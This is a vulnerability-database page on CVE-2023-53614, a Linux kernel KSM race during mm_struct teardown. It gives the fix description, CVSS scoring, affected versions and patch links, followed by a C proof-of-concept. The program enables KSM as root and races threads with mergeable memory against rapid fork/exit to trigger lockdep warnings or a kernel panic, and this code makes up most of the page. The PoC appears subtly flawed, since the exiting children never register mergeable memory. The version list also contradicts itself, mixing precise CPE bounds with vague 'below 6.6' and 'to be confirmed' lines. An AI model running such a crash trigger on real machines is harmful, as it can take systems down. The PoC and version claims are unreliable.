Security Vulnerability Report
CVE-2023-53614 CVSS 4.7 MEDIUM

Published: 2025-10-04 16:15:58
Last Modified: 2026-03-17 13:49:59
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

mm/ksm: fix race with VMA iteration and mm_struct teardown

exit_mmap() will tear down the VMAs and maple tree with the mmap_lock held in write mode. Ensure that the maple tree is still valid by checking ksm_test_exit() after taking the mmap_lock in read mode, but before the for_each_vma() iterator dereferences a destroyed maple tree.

Since the maple tree is destroyed, the flags telling lockdep to check an external lock have been cleared. Skip the for_each_vma() iterator to avoid dereferencing a maple tree without the external lock flag, which would create a lockdep warning.

CVSS Details

CVSS Score: 4.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
(Attack Vector: Local; Attack Complexity: High; Privileges Required: Low; User Interaction: None; Scope: Unchanged; Confidentiality Impact: None; Integrity Impact: None; Availability Impact: High)
Exploitability Score: 1.0
Impact Score: 3.6
Weakness: CWE-362 (Concurrent Execution using Shared Resource with Improper Synchronization, "Race Condition")

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.1 up to, but excluding, 6.1.22) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.2 up to, but excluding, 6.2.9) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.3:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.3:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.3:rc3:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.6 (affected stable versions)
Linux Kernel 6.6.x (to be confirmed against the specific patch version)
Linux Kernel 6.7.x (to be confirmed against the specific patch version)
All Linux kernel versions that contain the unfixed ksm code

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
// PoC for CVE-2023-53614 - Linux Kernel KSM race condition
// Exercises the race between ksmd's VMA iteration and mm_struct teardown in
// exit_mmap(). On an affected kernel with lockdep enabled, the expected symptom
// is a lockdep warning in dmesg.
// Note: requires root or CAP_SYS_ADMIN to enable KSM via sysfs.
// Build: gcc -pthread -o ksm_race ksm_race.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <pthread.h>

#define NUM_THREADS 100
#define NUM_ITERATIONS 1000

// Enable KSM by writing "1" to /sys/kernel/mm/ksm/run (requires root)
int enable_ksm(void) {
    int fd = open("/sys/kernel/mm/ksm/run", O_WRONLY);
    if (fd < 0) {
        perror("Failed to open KSM control (need root)");
        return -1;
    }
    if (write(fd, "1", 1) != 1) {
        perror("Failed to enable KSM");
        close(fd);
        return -1;
    }
    close(fd);
    return 0;
}

// Worker thread: maps identical pages and gives ksmd a chance to scan them
void *ksm_worker(void *arg) {
    (void)arg;
    size_t size = 4096 * 100; // 100 pages
    void *mem = mmap(NULL, size, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) {
        return NULL;
    }
    // ksmd only scans regions registered with MADV_MERGEABLE
    madvise(mem, size, MADV_MERGEABLE);
    // Fill with identical content to encourage KSM merging
    memset(mem, 'A', size);
    // Keep the mapping alive briefly to allow KSM scanning
    usleep(10000);
    munmap(mem, size);
    return NULL;
}

// Rapid process creation/exit: each child's exit_mmap() tears down its VMAs
// while ksmd may be iterating them
void trigger_exit_race(void) {
    for (int i = 0; i < NUM_ITERATIONS; i++) {
        pid_t pid = fork();
        if (pid == 0) {
            // Child: allocate memory, touch it, and exit immediately
            void *mem = mmap(NULL, 4096 * 50, PROT_READ | PROT_WRITE,
                             MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
            if (mem != MAP_FAILED) {
                memset(mem, 0x42, 4096 * 50);
            }
            _exit(0); // exit_mmap() runs during process teardown
        } else if (pid > 0) {
            int status;
            waitpid(pid, &status, 0);
        }
    }
}

int main(void) {
    printf("CVE-2023-53614 PoC - KSM Race Condition\n");
    if (enable_ksm() != 0) {
        printf("Run as root to enable KSM\n");
        return 1;
    }
    printf("KSM enabled. Starting race condition trigger...\n");

    // Create threads that keep mergeable memory regions alive for ksmd to scan
    pthread_t threads[NUM_THREADS];
    for (int i = 0; i < NUM_THREADS; i++) {
        pthread_create(&threads[i], NULL, ksm_worker, NULL);
    }

    // Concurrently trigger rapid process exits to race with VMA iteration
    trigger_exit_race();

    for (int i = 0; i < NUM_THREADS; i++) {
        pthread_join(threads[i], NULL);
    }

    printf("Race condition trigger completed.\n");
    printf("Check dmesg for lockdep warnings or kernel panic.\n");
    return 0;
}
```

References

https://git.kernel.org/stable/c/286b0cab31bac29960e5684f6fb331d42f03b363 (Patch)
https://git.kernel.org/stable/c/6db504ce55bdbc575723938fc480713c9183f6a2 (Patch)
https://git.kernel.org/stable/c/b4f664ffd8f78c05a1fd542a28bc5a11e994c014 (Patch)